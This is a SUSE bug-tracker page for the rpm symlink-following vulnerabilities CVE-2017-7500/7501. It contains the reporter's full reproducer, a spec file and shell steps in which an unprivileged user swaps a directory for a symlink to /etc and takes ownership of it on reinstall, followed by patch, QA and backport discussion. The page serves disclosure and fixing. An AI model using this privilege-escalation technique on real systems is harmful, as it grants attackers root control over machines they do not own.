Bug 943457 - (CVE-2017-7500) VUL-1: CVE-2017-7500 CVE-2017-7501: rpm: user owned subdirectories in rpm packages can lead user to root escalation
(CVE-2017-7500)
VUL-1: CVE-2017-7500 CVE-2017-7501: rpm: user owned subdirectories in rpm pac...
Status: CONFIRMED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P4 - Low : Normal
: ---
Assigned To: Michael Schröder
Security Team bot
CVSSv2:SUSE:CVE-2017-7500:6.8:(AV:L/A...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2015-08-27 12:44 UTC by Ludwig Nussel
Modified: 2022-02-09 09:47 UTC (History)
14 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
CVE-2017-7500.patch (1.12 KB, patch)
2017-07-11 13:29 UTC, Marcus Meissner
Details | Diff
CVE-2017-7501-1.patch (2.47 KB, patch)
2017-07-11 13:31 UTC, Marcus Meissner
Details | Diff
CVE-2017-7501-2.patch (1.41 KB, patch)
2017-07-11 13:32 UTC, Marcus Meissner
Details | Diff
CVE-2017-7501-3.patch (827 bytes, patch)
2017-07-11 13:32 UTC, Marcus Meissner
Details | Diff

Note You need to log in before you can comment on or make changes to this bug.
Description Ludwig Nussel 2015-08-27 12:44:38 UTC
rpm follows symlinks to directories when installling packages. Ie if a package contains /usr/share/foo/bar and /usr/share/foo is a symlink to /etc, rpm would install bar into /etc. Moreover, rpm also applies all attributes to the directory the symlink is pointing at.

That becomes a problem if a package contains subdirectories in directories
owned by an unprivileged user. That unprivileged user can then replace the
subdirectory with a symlink to a root owned directory. On next package upgrade
rpm would follow the symlink, change the ownership of the linked directory and
install files there.

Consider the following example:

$ cd ~/rpmbuild/SPECS
$ cat perm.spec 
Name:           perm
Version:        1
Release:        0
Group:          Development/Tools/Building
Summary:        Lorem ipsum
License:        GPL-2.0+
BuildRoot:      %_tmppath/%name-%version-build
Url:            http://www.opensuse.org/
BuildArch:      noarch

%description
Lorem ipsum dolor sit amet, consectetur adipisici elit, sed
eiusmod tempor incidunt ut labore et dolore magna aliqua. Ut enim
ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut
aliquid ex ea commodi consequat. Quis aute iure reprehenderit in
voluptate velit esse cillum dolore eu fugiat nulla pariatur.
Excepteur sint obcaecat cupiditat non proident, sunt in culpa qui
officia deserunt mollit anim id est laborum.

%prep
%build

%install
install -d -m 755 %buildroot/usr/share/foo/bar
echo test > %buildroot/usr/share/foo/bar/baz

%files
%defattr(0755,wwwrun,root)
%dir /usr/share/foo
%dir /usr/share/foo/bar
/usr/share/foo/bar/baz

%changelog
$ rpmbuild -bb perm.spec
...
$ sudo rpm -U ~/rpmbuild/RPMS/noarch/perm-1-0.noarch.rpm
$ l /usr/share/foo/
insgesamt 0
drwxr-xr-x 1 wwwrun root    6 27. Aug 14:34 ./
drwxr-xr-x 1 root   root 6132 27. Aug 14:34 ../
drwxr-xr-x 1 wwwrun root    6 27. Aug 14:34 bar/
$ sudo -u wwwrun rm -r /usr/share/foo/bar
$ sudo -u wwwrun ln -s /etc /usr/share/foo/bar
$ l /usr/share/foo/bar
lrwxrwxrwx 1 wwwrun www 4 27. Aug 14:35 /usr/share/foo/bar -> /etc/
$ l -d /etc/
drwxr-xr-x 1 root root 6010 27. Aug 14:21 /etc//
$ sudo rpm -U ~/rpmbuild/RPMS/noarch/perm-1-0.noarch.rpm --force
$ l -d /etc/
drwxr-xr-x 1 wwwrun root 6016 27. Aug 14:35 /etc//
$ l /etc/baz
-rwxr-xr-x 1 wwwrun root 5 27. Aug 14:34 /etc/baz*
Comment 17 Michael Schröder 2016-02-10 10:23:09 UTC
Nope.
Comment 20 Michael Schröder 2016-02-10 11:56:27 UTC
#18: if you read that comment in the Fedora bugzilla you'll notice that they asked me in irc about it.
Comment 21 Andreas Stieger 2016-02-10 12:20:00 UTC
Adding Florian Festi <ffesti@redhat.com> to cc

Paraphrases summary from SUSE internal discussion:

"This may be a problem known for a long time unfixable without breaking other valid use cases."

"A fix would be a hard change in behavior, needs to be acked by upstream. Many changes required to make it  that race-free, user could modify directory contents while an rpm gets installed."

"Possibly previously discussed in the context of chkstat."
Comment 22 Ludwig Nussel 2017-05-04 14:42:27 UTC
So another year passed and we are still vulnerable with packagers adding more vulnerable packages.
Comment 26 Ludwig Nussel 2017-06-20 14:49:48 UTC
found another new package submission to factory to fall into the trap. can this be made public now?
Comment 27 Marcus Meissner 2017-07-04 07:38:28 UTC
(This issue is public now.)
Comment 28 Marcus Meissner 2017-07-11 13:26:31 UTC
also CVE-2017-7501
Comment 29 Marcus Meissner 2017-07-11 13:29:26 UTC
Created attachment 731961 [details]
CVE-2017-7500.patch

CVE-2017-7500.patch   for the directory traversal exploit part
Comment 30 Marcus Meissner 2017-07-11 13:30:16 UTC
https://bugzilla.redhat.com/show_bug.cgi?id=1452133 

 CVE-2017-7501 rpm: Following symlinks to files when installing packages allows privilege escalation

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-7500

 CVE-2017-7500 rpm: Following symlinks to directories when installing packages allows privilege escalation
Comment 31 Marcus Meissner 2017-07-11 13:31:34 UTC
Created attachment 731962 [details]
CVE-2017-7501-1.patch

CVE-2017-7501-1.patch  1/3 patches for file override
Comment 32 Marcus Meissner 2017-07-11 13:32:03 UTC
Created attachment 731963 [details]
CVE-2017-7501-2.patch

CVE-2017-7501-2.patch
Comment 33 Marcus Meissner 2017-07-11 13:32:23 UTC
Created attachment 731964 [details]
CVE-2017-7501-3.patch

CVE-2017-7501-3.patch
Comment 34 Konstantinos Tsamis 2018-05-17 14:07:59 UTC
Using the maintenance update SUSE:Maintenance:7433:165047, I am still getting the same results for before and after for this bug. Please see the section for bug #943457 in the report here: http://qam.suse.de/testreports/SUSE:Maintenance:7433:165047/log

I get the exact same results as comment #0 before and after. For me since this bug is VUL-1 means that the update needs rejecting.
Comment 35 Michael Schröder 2018-05-17 14:56:20 UTC
That's because you're creating the symlink as user root. rpm treats this as indication that it is ok to follow the symlink.

Note also that I didn't use the attached patches, but instead went with what rpm upstream committed.

(BTW, just curious, who created that testcase?)
Comment 36 Konstantinos Tsamis 2018-05-18 11:55:15 UTC
(In reply to Michael Schröder from comment #35)
> That's because you're creating the symlink as user root. rpm treats this as
> indication that it is ok to follow the symlink.
> 
> Note also that I didn't use the attached patches, but instead went with what
> rpm upstream committed.
> 
> (BTW, just curious, who created that testcase?)

So I tried again with the symlink created by the user (instead of wwwrun I used testsuser) and the file is still created. The permissions are still changed. From what I see it makes no difference. Can you please take a look at the report again at the same section? Maybe I did again something wrong?

I guess Ludwig Nussel created the testcase? If you have another happy to try it as well but I think this is ok, it shows the issue :)
Comment 37 Konstantinos Tsamis 2018-05-22 13:28:22 UTC
Please let me know if there is something I'm doing wrong, I need some help on this because I'm blocked. Is the reproducer not correct for the patches that you used? Can you give me a "better" one? More suited to show the bug? Setting needinfo because the more this bug is not reproduced, the more the update will take to go out.
Comment 38 Michael Schröder 2018-05-24 15:01:32 UTC
Hmm. Seems like the upstream fix is incomplete or wrong. I'm afraid I need to discuss this with the rpm people. (I have some idea on how to fix it but I don't know if this will break anything else.)
Comment 42 Swamp Workflow Management 2018-07-26 19:15:24 UTC
SUSE-SU-2018:2073-1: An update that solves one vulnerability and has two fixes is now available.

Category: security (moderate)
Bug References: 1094735,1095148,943457
CVE References: CVE-2017-7500
Sources used:
SUSE Linux Enterprise Module for Development Tools 15 (src):    rpm-4.14.1-10.3.1
SUSE Linux Enterprise Module for Basesystem 15 (src):    python-rpm-4.14.1-10.3.1, rpm-4.14.1-10.3.1
Comment 43 Swamp Workflow Management 2018-08-06 13:17:41 UTC
openSUSE-SU-2018:2215-1: An update that solves one vulnerability and has two fixes is now available.

Category: security (moderate)
Bug References: 1094735,1095148,943457
CVE References: CVE-2017-7500
Sources used:
openSUSE Leap 15.0 (src):    python-rpm-4.14.1-lp150.9.3.1, rpm-4.14.1-lp150.9.3.1
Comment 44 Klaus Troeger 2018-09-12 14:36:05 UTC
Quick question:

When will this fix be backported to SLES12SP2/SP3 ?
Comment 45 Michael Schröder 2018-09-13 15:05:15 UTC
Any time you like to release it. The patch is already finished, I just need to commit it and submit the update.
Comment 46 Klaus Troeger 2018-09-14 05:16:24 UTC
Thanks Michael !
Pls. do so for SLES11 SP4 / SLES12 SP2 & SP3, as my customer is awaiting it 
(Bundesagentur für Arbeit is somehow a bit more aligned to CERT/Fixes 
due to their natural alignment)
Comment 47 Klaus Troeger 2018-09-19 14:39:43 UTC
@Michael: Any news here ... customer was just asking about an update !
Comment 48 Michael Schröder 2018-09-19 15:29:49 UTC
The update is submitted to maintenance (SR#172484). It now needs to go through QA, which might take some time.
Comment 50 Swamp Workflow Management 2018-10-22 16:12:47 UTC
SUSE-SU-2018:3286-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1077692,943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    rpm-4.11.2-16.16.1
SUSE Linux Enterprise Server 12-SP3 (src):    python3-rpm-4.11.2-16.16.1, rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
SUSE CaaS Platform ALL (src):    rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
SUSE CaaS Platform 3.0 (src):    rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
OpenStack Cloud Magnum Orchestration 7 (src):    rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
Comment 51 Swamp Workflow Management 2018-10-24 13:11:56 UTC
openSUSE-SU-2018:3373-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1077692,943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
openSUSE Leap 42.3 (src):    python3-rpm-4.11.2-14.10.1, rpm-4.11.2-14.10.1, rpm-python-4.11.2-14.10.1
Comment 52 Klaus Troeger 2018-11-05 13:55:27 UTC
@Michael: 

SLES12SP2 (LTSS) is still missing ... can we release this, too ?
Comment 53 Michael Schröder 2018-11-05 14:44:04 UTC
Dunno. Should we?
Comment 54 Michael Schröder 2018-11-05 14:47:16 UTC
(There's nothing to submit from my side for this.)
Comment 55 Swamp Workflow Management 2018-11-23 20:18:34 UTC
SUSE-SU-2018:3884-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
SUSE OpenStack Cloud 7 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    rpm-4.11.2-16.21.1
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    rpm-4.11.2-16.21.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP4 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP3 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-LTSS (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Desktop 12-SP4 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Enterprise Storage 4 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE CaaS Platform ALL (src):    rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE CaaS Platform 3.0 (src):    rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
OpenStack Cloud Magnum Orchestration 7 (src):    rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
Comment 56 Swamp Workflow Management 2019-04-27 22:34:14 UTC
SUSE-SU-2018:3884-2: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 57 José Guilherme Vanz 2019-07-02 17:57:29 UTC
We need this fix for SLES11 SP3 (LTSS). There is a L3 bug with a customer requesting this fix as well. Is it possible?

Thanks!
Comment 58 Michael Schröder 2019-07-03 11:24:47 UTC
Bah, that's rpm-4.4.2.3. That'll be a lot for work for a VUL-1 classified bug. Why do they request it?
Comment 59 José Guilherme Vanz 2019-07-05 17:58:20 UTC
(In reply to Michael Schröder from comment #58)
> Bah, that's rpm-4.4.2.3. That'll be a lot for work for a VUL-1 classified
> bug. Why do they request it?

The customer is requesting because they are using SLES11 SP3 LTSS. Thus, they want the security fix. ;-)

https://bugzilla.suse.com/show_bug.cgi?id=1135195
Comment 60 Michael Schröder 2019-07-08 09:16:05 UTC
That wasn't my point. My point was that this is a very minor security problem (thus the VUL-1, i.e. "fix with the next update").
Comment 61 José Guilherme Vanz 2019-07-08 13:09:13 UTC
(In reply to Michael Schröder from comment #60)
> That wasn't my point. My point was that this is a very minor security
> problem (thus the VUL-1, i.e. "fix with the next update").

Do we have a fix for SLES 11 SP3 in progress? I can see only for SLES 12 and SLES 15. I don't think the customer is willing to upgrade to SLES 12, they have a good support time to SLES 11 SP 3 yet.
Comment 62 Michael Schröder 2019-07-08 14:26:45 UTC
Well, as L3 said they would do the backport I'm currently not working on it.
Comment 63 Radoslav Kolev 2022-02-09 08:20:57 UTC
Hello guys, 

I'm trying to make sure that CVE-2017-7501 is fixed in SLE 15SP2. It is marked as not affected in SMASH, also in the RH bugzilla and RPM changelog it is marked as fixed in version 4.14.0. But looking at the actual commit it narrowly didn't make it into rpm 4.14.0 https://github.com/rpm-software-management/rpm/commit/404ef011c300207cdb1e531670384564aae04bdc so it also didn't make it into our package in SP2, and there isn't a separate patch (like there is one for CVE-2017-7500).

It seems to me that may be we are still affected. Am I missing something?
Comment 64 Michael Schröder 2022-02-09 09:24:14 UTC
(SLE-15-SP2 comes with with 4.14.1)

I think it is included. There are just a couple of commits on top of it:

https://github.com/rpm-software-management/rpm/commit/2979d4ef5579e2bb3295ed0c97e322bebe5f0f46
https://github.com/rpm-software-management/rpm/commit/cd3b20574b4d75b973bfa9e6cdb15b6289ab27e3
Comment 65 Radoslav Kolev 2022-02-09 09:47:58 UTC
Thanks, Michael! That clears all my doubts.(In reply to Michael Schröder from comment #64)
> (SLE-15-SP2 comes with with 4.14.1)
> 
> I think it is included. There are just a couple of commits on top of it:
> 
> https://github.com/rpm-software-management/rpm/commit/
> 2979d4ef5579e2bb3295ed0c97e322bebe5f0f46
> https://github.com/rpm-software-management/rpm/commit/
> cd3b20574b4d75b973bfa9e6cdb15b6289ab27e3

Thanks Michael! That clears all my doubts.